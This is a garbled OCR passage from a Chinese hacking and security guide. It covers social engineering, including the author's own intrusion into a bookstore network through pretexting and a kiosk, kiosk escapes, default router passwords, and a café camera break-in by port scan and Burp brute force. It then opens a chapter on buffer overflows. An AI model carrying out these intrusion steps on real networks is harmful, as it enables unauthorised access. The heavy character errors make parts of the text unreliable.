流 真 的 只 是 会 说 话 这 么 简单 吗 ? 当然 不 是 。 人 与 人 的 交流 是 信息 的 沟通 ， 聪 明 的 交流 艺术 
家 们 往往 会 使 用 一 套 模型 来 描述 信息 沟通 的 全 过 程 ， 这 个 模型 中 包含 了 8 个 要 素 : 信息 发 
送 方 、 传 达 的 信息 、 对 发 送信 息 的 编码 、 信 息 传 播 的 通道 《信道 ) 、 信 息 接 收 方 、 解 码 过 
程 、 信 息 传 递 过 程 中 的 杂音 和 收 到 信息 后 接收 方 对 信息 发 送 方 的 反馈 。 这 些 基 本 要 素 相 互 
之 间 的 关系 如 图 7-1 所 示 。 
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图 7-1 信息 沟通 基本 要 素 相互 关系 模型 
发 送 方 将 目 己 想 要 传达 的 信息 编码 后 通过 信道 将 信息 传达 给 接收 方 ， 而 接收 方 收 到 信 
恩 后 将 信息 解码 为 自己 可 以 理解 的 形式 ， 并 给 予 发 送 方 一 定 的 反馈 ， 在 这 个 过 程 中 ， 传 播 
中 的 噪声 将 会 影响 到 信息 传递 的 效果 从 而 间接 地 干扰 到 接收 方 的 反馈 。 
这 样 的 说 明 对 于 读者 来 说 肯定 还 有 些 抽象 ， 下 面 用 一 个 实例 来 解释 在 实际 应 用 中 ， 这 
个 模型 如 何 匹配 到 交流 过 程 中 的 每 一 个 元 素 。 


张 三 和 季 四 是 一 对 异地 恋 的 情侣 ， 张 三 每 周 都 要 给 节 四 写 一 封 信 诉 说 自己 这 周 的 生活 。 


在 这 个 实例 中 ， 张 三 即 是 模型 中 的 信息 发 送 方 ， 她 想 要 和 李 四 分 享 的 生活 细节 是 需 
要 发 送 的 信息 ， 将 这 些 信息 用 文字 书写 在 信纸 上 并 封装 即 是 编码 的 过 程 ， 邮 寄 方 式 是 这 次 
交流 的 信道 ， 作 为 接收 方 的 李 四 拆 开 信封 阅读 信件 的 过 程 即 是 信息 解码 过 程 。 而 窗外 的 天 
气 ， 隔 壁 王 二 麻子 的 暗 送 秋波 都 是 此 次 信息 传输 过 程 中 的 噪声 ， 李 四 在 收 到 信件 后 可 能 会 
用 QQ、 微 信 或 书信 的 方式 回复 张 三 ， 这 就 是 接收 方 给 发 送 方 的 反馈 。 

从 上 述 的 模型 中 可 以 清楚 地 看 到 ， 在 一 次 信息 沟通 过 程 中 人 们 可 以 操作 的 环节 ， 这 是 
有 计划 地 发 起 一 次 交流 性 信息 获取 的 基础 。 当 然 ， 在 安全 领域 的 实际 应 用 中 ， 事 情 往 往 
要 复杂 得 多 ， 一 次 成 功 的 社会 工程 学 攻击 行动 往往 涉及 好 几 次 不 同形 式 〈 通 利 在 此 语 韦 
下 人 们 所 说 的 不 同形 式 ， 其 区 别 都 在 于 信息 沟通 的 通道 ) 的 交流 过 程 ， 所 以 有 计划 地 设计 
一 次 行动 流程 以 及 其 中 每 个 交流 环节 的 逻辑 链 才 能 让 社会 工程 学 攻击 的 实施 者 更 加 从 容 不 
迫 ， 从 而 更 轻松 地 达成 目标 。 在 了 解 如 何 构 造 行动 流程 以 及 逻辑 链 之 前 ， 先 来 看 这 样 一 个 
пв: 


两 个 年 轻 人 背 着 包 来 到 一 家 书店 ， 在 二 楼 找 了 两 张 椅 子 坐 下 后 从 包 中 取出 了 计算 机 。 
三 分 钟 后 其 中 一 人 起 身 到 三 楼 找到 一 台 触摸 式 自助 图 书 查询 终端 机 并 打开 了 几 个 奇怪 的 窗 
口 。 此 举 引起 了 书店 管理 人 员 的 注意 并 上 前 查看 ， 年 轻 人 并 没有 因此 走 开 ， 而 是 主动 与 其 
搭 了 几 句 话 后 将 屏幕 恢复 成 来 时 的 样子 ， 去 书架 取 了 两 本 书 ， 回 到 二 楼 与 同伴 优 袁 游 哉 地 
坐 了 一 个 下 午 。 


读者 或 许 还 有 些 不 解 ， 这 两 个 年 轻 人 是 为 何 而 来 ， 又 做 了 什么 呢 ? 事实 上 这 是 笔者 的 
一 次 杂 映 经 历 ， 为 了 癌 朋 友 证 明 漏洞 在 人 们 的 生活 中 无 处 不 在 ， 笔 者 决定 针对 上 自己 最 喜欢 
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去 的 书店 进行 一 次 社会 工程 学 攻击 ， 并 尝试 获取 书店 部 分 内 部 信息 来 展示 大 多 数 企业 对 于 
保护 目 喘 安全 的 无 能 。 当 然 ， 我 们 双方 都 为 此 下 了 注 ， 赌 注 是 一 顿 目 助 餐 。 

确定 目标 后 ， 笔 者 首先 对 书店 进行 了 一 次 侦察 ， 发 现 其 三 询 终 病 机 缺少 对 用 户 输 入 的 
限制 ， 而 但 询 终 病 机 往往 是 接 入 公司 内 网 的 ， 管 理 员 通过 终端 机 进行 的 操作 记录 也 极其 可 
能 泄露 重要 的 信息 。 可 这 家 书店 每 层 都 有 很 多 工作 人 员 管 理 ， 光 明正 大 地 操作 终端 机 显然 
不 聪明 ， 通 过 给 不 连接 外 网 的 终端 机 植 入 木马 远程 控制 渗透 显然 也 不 是 什么 好 主意 。 但 抱 
看 “既然 问题 存在 ， 就 应 当 加 以 利用 ”的 原则 ， 笔 者 最 终 还 是 决定 以 这 台 终 端 机 作为 突破 
口 来 渗透 目标 书店 ， 并 很 快 制订 了 一 个 如 下 的 渗透 方案 : 


与 书店 管理 层 沟通 一 获取 进行 “测试 书店 终端 查询 系统 漏洞 ”的 许可 一 进入 书店 对 终 
端 机 进行 操作 一 通过 内 网 渗透 获取 信息 。 


在 这 次 渗透 行动 中 ， 主 要 需要 考虑 的 只 有 两 次 交流 ， 自 先是 从 书店 省 理 层 获得 测试 许 
可 ， 其 次 则 是 如 何 面 对 普 通 工 作 人 员 和 保安 的 盘问 。 

在 互联 网 上 进行 了 仔细 的 寻找 后 ， 笔 者 并 没有 发 现 该 书店 任何 管理 人 员 如 手机 号 或 个 
人 邮箱 等 联系 方式 ， 但 作为 一 家 大 型 连锁 书店 ， 通 过 其 网 站 上 的 客服 QQ 联系 工作 人 员 和 总 
是 个 可 行 的 方案 ， 虽 然 这 些 客服 QQ 的 主人 未 必 具 有 许可 的 权限 ， 但 他 们 一 定 拥 有 癌 上 级 
反馈 的 渠道 ， 抱 看 这 样 的 想法 ， 笔 者 开始 设计 初次 交流 的 逻辑 链 了 。 

一 次 有 价值 的 交流 不 同 于 闲聊 ， 想 要 从 交流 中 获 益 就 必须 有 明确 的 逻辑 性 ， 而 拥有 一 
个 好 的 逻辑 链 的 第 一 步 ， 就 是 拥有 明确 的 目的 。 

首先 可 以 直接 将 行动 规划 中 的 部 分 逻辑 代入 作为 目标 ， 所 以 这 里 笔者 的 目的 就 是 : 


与 书店 管理 层 沟通 一 获取 进行 “测试 书店 终端 查询 系统 漏洞 ”的 许可 。 
先 将 达成 目标 的 综合 行为 代入 逻辑 链 : 


通过 与 书店 网 站 客服 沟通 获得 引荐 一 与 书店 管理 层 沟通 一 获取 进行 “测试 书店 终端 查 
询 系统 漏洞 ”的 许可 。 


再 把 交流 模型 代入 到 行为 中 : 
信息 发 送 方 : 笔者 + 要 编码 的 信息 (应 当 将 笔者 引荐 给 书店 管理 层 人 员 ) 一 编码 一 信 
道 互联 网 一 接收 方 : 书店 官方 客服 一 解码 信息 (认可 笔者 的 要 求 ) 一 将 笔者 引荐 给 书店 


管理 层 一 与 书店 管理 层 沟通 一 获取 进行 “测试 书店 终端 查询 系统 漏洞 ”的 许可 。 


确定 交流 模型 的 具体 元 素 后 ， 作 为 信息 发 送 方 尤其 要 对 编码 环节 进行 设计 ， 在 当前 的 
说 服 实例 中 ， 证 明 目 己 的 能 力 并 提出 要 求 显 然 是 一 个 不 错 的 方案 ， 将 其 放 入 逻辑 链 中 对 应 
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的 地 方 ， 再 把 整个 逻辑 链 加 以 整理 。 


寻找 一 个 话题 一 对 书店 客服 人 员 发 起 交流 一 引起 对 方 的 兴趣 一 让 对 方 对 自己 放松 警惕 
一 证 明 自 己 的 专业 性 一 提出 合理 的 请 求 一 说 服 书店 网 站 的 客服 人 员 一 将 笔者 引 莽 给 书店 管 
理 层 一 与 书店 管理 层 沟通 一 获取 进行 “测试 书店 终端 查询 系统 漏洞 ”的 许可 。 


制定 好 逻辑 链 后， 就 是 计划 实施 环节 了 。 作 为 一 个 安全 人 员 的 一 大 好 处 就 是 ， 一 旦 你 
告诉 别人 目 己 做 的 事情 ， 总 是 可 以 很 快 引 起 他 们 的 兴趣 ， 当 然 在 这 之 前 你 需要 证 明 上 自己 。 

能 引起 对 方 注意 的 话题 中 最 有 效 的 就 是 让 他 们 意识 到 目 己 对 身边 事物 的 认 知 出 现 了 偶 
差 ， 比 如 对 目 己 公司 网 站 的 安全 性 抱 有 了 过 大 期 望 : 经 过 短暂 的 研究 ， 笔 者 很 快 发 现 了 该 
书店 官网 存在 的 一 处 问题 并 登录 进 网 站 后 台 ， 这 惑 足够 了 ， 笔 者 没有 继续 深入 而 是 截图 直 
接 联 系 了 客服 汇报 了 这 个 问题 。 看 样子 该 网 站 的 客服 是 从 来 没有 遇见 过 白 帽 子 提交 漏洞 的 
情况 ， 显 得 很 恢 讶 。 这 时 笔者 表示 目 己 是 一 个 学 生 ， 为 了 完成 学 校 要 求 的 课外 活动 想 要 对 
自己 最 爱 的 书店 进行 一 次 公益 的 安全 性 检查 ， 并 希望 能 获得 许可 。 很 快 客 服 人 员 便 答应 回 
信息 主管 汇报 此 事 ， 并 在 得 到 回复 后 加 笔者 留 下 的 邮箱 中 发 送 通知 邮件 。 

交流 进行 得 很 成 功 ， 可 是 现实 却 不 尽 如 人 意 ， 过 了 几 天 笔者 仍 未 收 到 书店 的 通知 ， 
于 是 联系 了 上 次 沟通 的 客服 人 员 ， 他 很 遗憾 地 告诉 笔者 信息 主管 X 先 生出 差 了 暂时 联系 不 
上 ， 押 以 短期 内 不 能 给 出 答复 。 当 然 ， 笔 者 对 此 军 不 感到 遗憾 ， 信 息 主 管 出 差 这 个 情报 是 
一 个 很 有 价值 的 信息 ， 知 道 了 这 条 信息 后 的 第 二 天 ， 笔 者 与 一 个 朋友 就 市 着 计算 机 出 现在 
了 目标 书店 。 紧 接 看 就 发 生 了 上 面 片 段 中 的 一 和 磊 ， 笔 者 在 操作 终端 机 时 忽然 发 现 其 连接 的 
居然 是 书店 无 线 网 ， 于 是 查看 并 记 下 了 热点 的 密码 。 在 这 期 间 书 店 的 工作 人 员 前 来 询问 并 
制止 违规 操作 ， 于 是 笔者 对 他 说 目 己 已 经 癌 信 息 主 管 请 示 过 ，X 主 管 说 笔者 可 以 随便 来 书 
店 试 试看 。 借 一 个 虚拟 的 管理 人 员 把 反 第 的 事情 轻 摘 淡 写 融 了 过 去 是 很 有 效 的 一 招 ， 尽 管 
工作 人 员 表 示 没 有 收 到 通知 ， 但 潜意识 中 也 已 经 认可 了 这 种 操作 行为 并 不 构成 什么 威胁 。 

笔者 完成 了 得 看 热点 口令 的 操作 并 从 运行 窗口 看 到 了 历史 记录 中 访问 共享 服务 器 的 
记录 后 ， 通 过 笔记 本 电脑 连接 了 书店 内 部 网 络 ， 并 在 共享 服务 器 中 发 现 了 很 多 共享 给 员工 
用 的 设备 管理 账户 、 密 码 ， 通 过 这 些 账 户 和 口令 进一步 攻陷 了 内 网 中 的 几 台 交换 机 与 服务 
器 。 之 后 笔者 将 该 漏洞 反馈 给 了 书店 的 工作 人 员 ， 同 时 也 赢得 了 一 顿 目 助 餐 。 

除了 上 述 场景 ， 在 日 前 生活 中 使 用 交流 模型 可 以 让 谈话 变 得 更 加 理性 ， 而 构造 逻辑 链 
的 行为 在 很 多 场景 ， 如 应 聘 、 请 假 、 商 业 谈判 中 都 可 以 带 来 莫大 的 帮助 。 


73 АП EORI KER 


如 果 询 问 一 名 安全 专家 如 何 保障 个 人 隐私 和 财产 安全 ， 一 本 厚 厚 的 书 也 许 都 无 法 记 完 
回答 。 而 对 于 “大 众 应 当 如 何 防御 社会 工程 学 攻击 ”这 样 的 问题 ， 答 案 往往 却 是 无 解 。 木 
桶 效应 指出 : 一 只 木 桶 能 装 多 少 水 取决 于 它 最 短 的 那 块 木板 ， 同 样 的 道理 也 适用 于 安全 体 
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系 。 一 个 体系 的 安全 强度 取决 于 它 最 不 安全 的 边界 ， 当 社会 工程 师 把 目光 投 问 整个 生活 中 
的 安全 问题 时 ， 漏 洞 和 问题 将 变 得 比比 缘 是 。 这 些 漏洞 和 问题 往往 就 伴随 着 人 们 的 粗心 大 
意 、 满 不 在 乎 和 一 知 半 解 ， 可 在 这 些 最 薄弱 的 边缘 环节 出 现 的 问题 ， 有 时 却 可 能 导致 整个 
安全 大 厦 的 衣 塌 。 社 会 工程 师 需 要 有 一 双 擅 长 发 现 被 人 们 忽略 了 的 问题 的 眼睛 ， 本 章 也 将 
束 这 类 问题 中 的 一 些 为 读者 进行 深入 浅 出 地 讲解 。 


7.3.1 终端 机 安全 


上 节 的 故事 中 ， 读 者 束 已 经 见 到 了 一 次 真实 的 由 终端 机 引起 的 安全 事故 。 事 实 上 终端 
机 漏洞 正 是 笔者 最 津津 乐 道 的 一 类 问题 ， 因 为 这 些 设 备 的 持 有 者 往往 都 是 银行 、 公 司 、 商 
场 、 学 校 等 大 型 目标 ， 这 些 厂商 可 能 会 投入 大 笔 的 资金 来 确保 其 安全 性 ， 可 终 疾 机 这 样 的 
“ 短 板 ” 一 旦 出 现 问题 就 可 能 导致 整个 大 的 安全 体系 土 朋 也 解 。 

当然 ， 大 多 数 的 终端 机 在 币 规 用 户 操作 下 都 是 不 会 出 现 问题 的 ， 那 么 恶意 攻击 者 又 是 
怎么 利用 这 些 设 备 的 呢 ? 最 重要 的 目 然 是 要 让 这 些 基 于 操作 系统 的 大 家 伙 们 回 到 操作 系统 
界面 。 导 致 这 类 漏洞 出 现 的 可 能 原因 可 以 分 为 便 件 问题 和 软件 问题 ， 下 面 将 为 大 家 一 一 
介绍 。 


1. 硬件 处 置 不 当 导 致 的 终端 机 系统 被 破解 


(1) 存在 外 置 的 USB 接 口 。 当 一 个 终端 机 没有 将 其 外 置 的 USB 接 口 封 起 来 时 ， 就 像 
是 一 块 送 给 攻击 者 吃 的 肥 肉 ， 历 届 黑 帽 大 会 上 ， 甚 至 曾 有 黑客 演示 过 通过 插入 恶意 USB 设 
备 让 指定 型 号 的 ATM 吐 钱 的 案例 。 当 然 ATM 的 USB 接 口外 露 现在 已 经 几乎 见 不 到 了 ， 但 
很 多 公司 的 设备 仍然 如 此 ， 这 种 情况 下 恶意 攻击 者 只 需要 插入 一 个 键盘 设备 即 可 控制 整 台 
机 器 。 

(2) 电源 姑 露 在 外 且 无 人 管理 。 很 多 终端 机 是 通过 在 开机 局 动 项 中 加 入 软件 启动 的 
脚本 来 在 开机 后 打开 应 用 软件 的 ， 这 样 如 果 电 源 暴 露 在 外 ， 攻 击 者 只 需要 将 机 器 重启 ， 并 
利用 终端 机 刚刚 进入 操作 系统 的 时 间 进 行 恶 意 操 作 ， 例 如 杀 死 应 用 软件 进程 ， 即 可 阻止 其 
进入 不 可 操作 的 界面 。 


2. 软件 设置 不 当 导 致 的 终端 机 被 破解 问题 


(1) 管理 员 留 下 了 方便 管理 机 器 的 后 门 。 很 多 懒惰 的 管理 员 为 了 方便 目 己 管理 终端 
机 ， 可 能 会 设置 一 些 特殊 手势 使 机 器 回 到 果 面 ， 例 如 双 指 旋转 等 。 攻 击 者 可 以 多 尝试 几 种 
手势 来 调 出 系统 界面 ， 同 时 ， 藏 在 条 面 边缘 的 键盘 也 会 导致 问题 ， 如 果 权 限 足 够 的 话 攻击 
者 可 以 直接 调 出 CMD 来 操作 机 器 ， 或 按 Win+D 组 合 键 直 接 回 到 桌面 ， 如 图 7-2 所 示 。 

(2) 没有 茶 止 右键 动作 。 在 安装 应 用 软件 之 前 ， 大 多 数 终端 机 触 屏 都 是 文 持 右键 操 
作 的 ， 例 如 长 按 动 作 和 旋转 动作 ， 如 果 应 用 软件 没有 茶 止 用 户 的 右键 操作 ， 那 么 通过 打印 
机 等 功能 再 调 出 系统 目录 ， 打 开 软 键盘 即 可 操作 当前 终端 机 。 

(3) 软件 漏洞 。 有 些 终 问 机 应 用 软件 本 身 束 存在 漏洞 ， 一 些 违 法 的 用 户 操 作 ， 例 如 
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按键 盘 同 时 单 击 屏幕 上 的 相同 功能 键 ， 或 者 多 指 触 控 快 速 点击 等 即 可 导致 软件 良 溃 ， 攻 击 


者 从 而 能 够 达到 控制 目标 终端 机 的 目的 。 
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图 7-2 软 键盘 导致 的 终端 机 被 破解 


7.3.2 无 线 网 中 的 路 由 兹 配置 问题 


从 各 大 运营 商 和 商业 巨头 开始 抢占 公共 热点 开始 ， 如 今 在 很 多 城市 从 商场 到 超市 ， 从 
咖啡 第 到 路 边 小 吃 店 ， 到 处 都 有 公共 热点 的 影子 。 可 又 不 时 地 有 人 爆料 这 些 公 共 热 点 不 安 
全 ， 这 显然 是 正确 的 。 撤 开 恶 意 AP 不 谈 ， 很 多 私人 商家 设置 的 无 线 网 络 本 身 就 毫 无 安全 


性 可 言 。 


很 多 家 用 路 由 器 是 不 强制 在 配置 中 修改 密码 的 ， 这 也 就 导致 了 很 多 没有 安全 意识 的 商 
家 在 配置 好 热点 后 从 来 没 想 过 要 修改 路 由 器 密码 ， 游 走 在 城市 中 ， 使 用 用 尸 名 admin、 密 
码 admin 往 往 可 以 登录 一 大 批 没 有 修改 密码 的 路 由 器 。 当 恶意 攻击 者 进入 路 由 嚣 后， 可 以 
使 用 端口 转发 等 多 种 方式 来 移 取 和 监控 用 户 的 上 网 信息 。 


7.3.3 ”管理 员 对 内 网 环境 的 盲目 自信 


安全 问题 是 很 多 网 络 管理 员 都 容易 忽视 的 问 
题 ， 即 使 他 们 想到 外 界 有 很 多 穷 凶 极 恶 的 黑客 ， 
也 不 会 意识 到 在 自己 的 内 网 里 ， 可 能 就 存在 几 台 
那 恶 的 计算 机 。 在 他 们 管理 下 的 很 多 设备 都 和 上 
述 无 线路 由 器 一 样 使 用 大 默认 密码 或 者 admin888 
这 样 极其 脆弱 的 弱 口 令 ， 就 如 这 人 台 影 院 的 交换 机 
一 般 ， 如 图 7-3 所 示 。 

说 到 内 网 中 的 设备 ， 最 让 攻击 者 激动 的 英 过 
于 摄像 头 了 ， 笔 者 的 一 位 朋友 就 很 热衷 于 在 城市 
中 寻找 漏洞 ， 下 面 就 是 他 针对 摄像 头 的 一 次 渗透 
全 过 程 ， 这 次 渗透 是 在 一 家 咖啡 厅 中 进行 的 。 
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7-3 ”笔者 随意 试 了 几 组 口令 就 直接 telnet 
登录 上 了 这 人 台 设 备 
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首先 ， 连 入 咖啡 厅 里 的 WiFi， 用 ipconfig 命 令 查 看 所 处 的 网 络 环境 ， 可 以 看 到 本 机 的 
IP 地 址 是 192.168.1.105， 网 关 地 址 是 192.168.1.1， 如 图 7-4 所 示 。 


Micros oft Windows ХР [h КА 5.1.2600] 
<C) hk 177) = 1985-2001 “бұқа soft Corp. 


C:\Documents and Settings ‘dministrator>ipconf ід 


Windows IP Configuration 


无 线 网 络 连 控 : 


Ethernet adapter 
Connection—specific DNS Suffix . : 
IP ñddres 2 192.168.1.105 
Subnet Mask о - - s s s ое © о . 3 4595.459.699.0 
Default Gateway = 192.168 .1.1 
Ethernet adapter НЕ БЕ : 


Медіа State . . . . < < < < < = < © Мела Ф41соплесесен 


C:\Documents and бесбіпде “Ибтіпісекасбок> 


图 7-4 无 线 网 络 环境 
О RAMET 
问 权限 进行 了 限制 。 接 下 来 ， 扫 描 所 处 网 段 的 端口 开放 情况 |шікел ресор тт 


线程 :一 一 一 一 一 一 一 一 /一 一 一 
Ж 7-5) . КЕЕН 
这 里 将 端口 重新 设置 了 一 下 ， 分 别 设 置 了 21、80、 ья 205. ВЕ ята 


1433、3306、8000、8080、8081 几 个 端口 ，IP 端 设置 的 是 Е 
192.168.1.1 一 192.168.1.23$， 然 后 开始 扫描 。 不 一 会 扫描 结 
果 便 出 来 了 ， 简 单 整理 为 如 下 内 容 。 

192.168.1.1 80 

192.168.1.103 21 

192.168.1.205 80 

192.168.1.231 21 

从 经 验 判 断 ，192. 168.1.205 应 该 РЕЗ, 答 试 在 浏览 名 上 进行 访问 ， 如 图 7-6 所 示 。 


т |E) http:A7192.168.1.2057 


图 7-5 ”扫描 端口 


图 7-6 ”登录 接口 
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N АА 、 黑客 与 安全 技术 指南 


用 Burp 工 具 对 登录 框 进行 抓 包 并 尝试 暴力 破解 ， 很 快 便 爆 破 成 功 : 用 户 名 为 admin; 
密码 为 admin123， 并 成 功 登 录 〈( 见 图 7-7) 。 


GAMERA 


图 7-7 用 Burp 工 具 破 获 用 户 名 、 密 码 并 成 功 登 录 
从 上 例 可 以 看 出 ， 这 些 被 人 们 忽略 的 设备 ， 其 安全 性 就 犹如 空气 一 般 不 堪 一 击 。 这 也 
正 是 安全 专家 们 对 于 个 人 信息 安全 能 够 给 出 无 数 建议 的 原因 ， 由 于 人 们 喘 边 存在 太 多 的 安 
全 隐患 ， 对 于 每 个 人 来 说 ， 武 装 到 牙齿 的 保护 也 未 必 能 够 确保 目 己 的 隐私 或 者 信息 不 被 泄 
露 ， 也 内 能 做 得 越 多 越 好 了 。 


7.4 社会 工程 学 工具 


孔子 说 “ 工 欲 善 其 事 ， 必 先 利 其 器 ”， 相 信 大 家 都 耳熟能详， 好 的 工具 能 使 你 的 工作 
效率 提高 不 少 ， 熟 练 使 用 正确 的 工具 则 会 大 大 提高 工作 效率 ， 本 节 将 讲解 社会 工程 学 中 用 
到 的 工具 。 


7.4.1 在 线 工具 


在 线 信息 搜集 的 重要 性 前 面 已 经 提 到 ， 下 面 首 先 来 看 看 社会 工程 学 中 的 在 线 工具 。 
1. 搜索 引擎 


在 我 国 ， 绝 大 多 数 人 喜欢 使 用 的 搜索 引擎 不 是 谷歌 ， 而 是 百度 。 百 度 的 衍生 产品 也 非 
帝 多 ， 例 如 百度 贴吧 ， 如 朱 我 们 需要 得 找 一 个 人 的 信息 资料 ， 有 什么 资料 比 他 目 己 曾 经 说 
过 的 话 更 直观 呢 ? 百度 贴吧 这 个 平台 则 很 可 能 会 令 人 满意 的 内 容 。 同 时 ， 搜 索引 擎 拥有 一 
种 “语法 ”， 善 用 搜索 引擎 的 语法 ， 能 达到 事半功倍 的 效果 。 


2. Maltego 
Maltego 是 一 球 功 能 非常 强大 的 软件 ， 它 能 够 目 动 采 集 大 量 信息 并 且 为 用 户 实现 数量 
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第 7 章 ” 初 识 社会 工程 学 一 一 bug 出 在 人 身上 уде 7 Жа 


的 目 动 关联 ， 可 以 为 用 户 节 省 数 小 时 的 搜索 时 间 ， 并 且 可 以 展示 信息 的 关键 图 ， 它 的 真正 
强大 之 处 在 于 找到 这 些 数据 之 间 的 关系 ， 即 便 数据 的 价值 很 高 ， 但 是 展示 信息 之 间 的 关系 
对 于 社会 工程 人 员 更 有 价值 。 


3. 社会 工程 人 员工 具 包 


近 些 年 来 ， 出 现 了 很 多 社会 工程 人 员工 具 包 ， 它 们 比较 符合 国人 的 使 用 习惯 ， 社 会 工 
程 人 员工 具 包 包括 众多 的 小 工具 ， 在 各 种 工具 包 中 ， 你 可 以 找到 很 多 你 喜欢 的 或 者 常用 的 
工具 ， 你 也 可 以 去 找 找 国 外 的 社会 工程 人 员工 具 包 ， 其 中 有 诸如 PDF 攻击 一 类 的 小 工具 。 


7.4.2 物理 工具 

除了 一 些 在 线 工 具 ， 社 会 工程 学 所 使 用 的 物理 工具 也 不 少 ， 其 中 很 多 都 是 生活 中 常见 
的 物品 ， 这 也 印证 了 那 句 话 “没有 办 不 到 ， 只 有 想不到 ”。 

1. ОЖ 


在 U 盘 里 安装 好 系统 ， 例 如 Kali Linux， 随 时 能 在 各 种 计算 机 上 插入 启动 。 与 U 盘 类 
似 ，BadUSB 也 可 以 用 于 进行 社会 工程 学 攻击 。 


2. 名 片 和 特殊 服装 


在 与 人 接触 时 ， 一 张 看 起 来 符合 目 己 身份 的 名 片 可 以 让 目标 很 快 对 攻击 者 产生 信任 
感 ， 同 时 一 些 特殊 服装 可 以 帮助 他 们 伪装 成 一 些 特殊 身份 一 一 比如 在 前 文 提 到 的 伪装 成 快 
弟 小 哥 ， 就 需要 一 件 快 递 公司 工 作 人 员 的 服装 。 


З. 纸张 和 笔 


无 论 在 哪里 ， 随 喘 携 帝 纸 和 笔 都 是 一 个 很 好 的 习惯 ， 不 同 于 电子 备 瑟 录 ， 纸 张 给 人 的 
发 挥 空间 更 大 ， 不 仅 可 以 随时 记录 目前 的 进展 情况 ， 还 可 以 规划 下 一 步 动 作 。 但 一 定 要 注 
意 销 毁 重 要 内 容 ， 别 让 这 个 习惯 成 为 绊脚石 。 


75 社会 工程 学 的 应 用 


社会 工程 学 是 一 门 独特 且 富 有 魅力 的 学 科 ， 它 来 源 于 生活 ， 但 社会 工程 学 只 是 一 门 独 
立 的 学 问 吗 ?当然 不 是 ! 下面 就 来 探讨 社会 工程 学 和 其 他 技术 的 配合 方法 。 


7.5.1 社会 工程 学 与 前 端 安全 
有 一 个 经 典 的 社会 工程 学 攻击 案例 ; 社会 工程 人 员 利用 人 们 的 好 奇 心 或 者 贪图 小 便 
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АА 黑客 与 安全 技术 指南 


当 打 开 一 个 文档 或 用 浏览 器 打开 一 个 网 址 时 ， 也 许 读 者 会 很 快 被 文档 或 网 页 中 的 丰富 
的 内 容 所 吸引 ， 但 你 却 不 会 知道 ， 这 可 能 有 一 个 木马 已 经 悄悄 地 在 目 己 的 计算 机 里 留 下 了 
后 门 ， 你 的 游戏 账号 、 隐 私信 息 等 正在 被 屏 医 男 一 端的 攻 茶 茶 拿 走 。 现 在 应 用 软件 层 出 不 
穷 ， 无 论 是 微软 、Adobe 这 些 大 型 公司 ， 还 是 一 些 不 知名 的 小 公司 旗下 都 有 众多 产品 。 有 
位 大 牛 曾经 说 过 ， 不 可 能 存在 绝对 安全 的 软件 ， 在 这 一 章 中 ， 笔 者 将 市 大 家 走 入 漏洞 的 世 
界 ， 看 看 一 个 小 小 的 逻辑 错误 究竟 会 造成 怎样 的 严重 后 果 。 

这 一 章 会 涉及 很 多 汇编 语言 和 C 语 言 的 知识 ， 笔 者 尽量 降低 难度 为 大 家 还 原 漏 洞 触发 
以 及 攻击 的 整个 过 程 ， 并 罕 插 介绍 一 些 汇编 语言 和 C 语 言 的 知识 。 


8.1 Эн ле 


8.1.1 什么 是 软件 漏洞 分 析 


Web 闹 有 Web 端 的 漏洞 ， 系 统 有 系统 的 漏洞， 应 用 软件 有 应 用 软件 的 漏洞 ， 而 它们 绝 
大 多 数 都 是 由 于 简单 的 逻辑 错误 导致 的 ， 所 以 从 另 一 个 角度 讲 ， 黑 客 和 程序 员 也 有 着 生丝 
万 缕 的 联系 。 有 时 候 当 一 个 程序 员 费 了 几 个 月 的 时 间 号 了 几 十 万 行 代码 ， 但 是 黑客 一 个 小 
小 的 操作 可 能 就 要 让 这 个 程序 重 写 一 人 遍 。 

其 实 漏 洞 的 分 析 就 是 在 逆向 进行 漏洞 发 生 的 过 程 ， 假 如 说 这 个 程序 因为 执行 了 共 些 函 
数 和 茶 些 畸形 字符 串 骨 沉 了， 如 果 崩 演 的 这 一 刻 叫 作 案 发 现场 的 话 ， 我 们 就 要 回溯 到 程序 
зА, АЗ Вие? fE. 

在 此 之 前 ， 需 要 卉 懂 一 些 概念 ， 首 先是 栈 的 概念 ， 这 对 于 漏洞 分 析 全 关 重 要 。 其 实 
无 论 是 漏洞 ， 还 是 逆 四 这 样 的 反 汇 编 操 作 ， 或 是 正四 的 编程 ， 我 们 都 需要 了 解 它 们 ， 因 为 
PC 端 和 移动 端 都 一 样 ， 都 有 堆栈 操作 。 

栈 其 实 可 以 看 作 一 块 空间 ， 当 调用 一 个 函数 参数 的 时 候 ， 这 个 参数 就 会 进 到 这 个 栈 
里 ， 这 个 空间 就 好 像 一 个 死胡同 ， 先 进来 的 就 在 最 里 面 ， 后 和 面 依次 排列 ， 所 以 栈 对 于 参数 
的 操作 是 先进 后 出 ， 后 进 先 出 。 

其 实 一 个 程序 的 操作 就 是 不 断 地 在 对 栈 操作 ， 当 调用 一 个 函数 的 时 候 ， 就 会 开辟 一 块 
栈 空间 ， 然 后 把 这 个 函数 要 用 的 参数 全 部 放 到 栈 里 ， 经 过 一 系列 操作 之 后 ， 会 将 这 些 参 数 
释放 出 来 ， 返 回 茶 些 结果 给 外 层 的 调用 函数 ， 最 后 再 释放 这 块 空间 ， 而 大 多 数 的 漏洞 部 是 
发 生 在 这 里 。 

所 谓 缓冲 区 洲 出 ， 可 以 分 为 栈 洲 出 和 堆 洲 出 ， 说 白 了 就 是 在 进行 这 些 函 数 操作 的 时 
候 ， 可 能 由 于 一 个 1f 语 句 或 者 一 个 strcpy 函 数 导 致 栈 或 者 堆 被 破坏 ， 导 致 程序 无 法 正常 执行 
它 该 执行 的 内 容 ， 这 就 造成 了 骨 沉 ， 也 就 造成 了 漏洞 的 产生 。 


- ма -- 


第 8 章 ， 逆向 技术 与 软件 安全 = ла 


8.1.2 漏洞 分 析 的 作用 


有 很 多 人 觉得 漏洞 分 析 没 什么 用 ， 不 如 那些 Web 端 漏洞 危险 ， 其 实 软件 漏洞 造成 的 危 
害 是 极 大 的 ， 例 如 2008 年 一 个 震 居 世界 的 超级 漏洞 MS08-067， 将 整个 Windows XP 系统 以 
及 Windows Server 2003 系 统 推 到 了 风口 浪 尖 。 很 难 想 象 ， 当 输入 对 方 的 一 个 IP 地 址 ， 就 能 
够 控制 对 方 的 计算 机 ， 时 至 今日 ，MS08-067 依 然 被 应 用 在 黑客 的 攻防 当中 ， 而 这 个 漏洞 
诞生 的 原因 正 是 对 于 “/” 字 符 的 向 前 检索 。2014 年 仍然 是 漏洞 集体 爆发 的 一 年 ， 年 初 的 
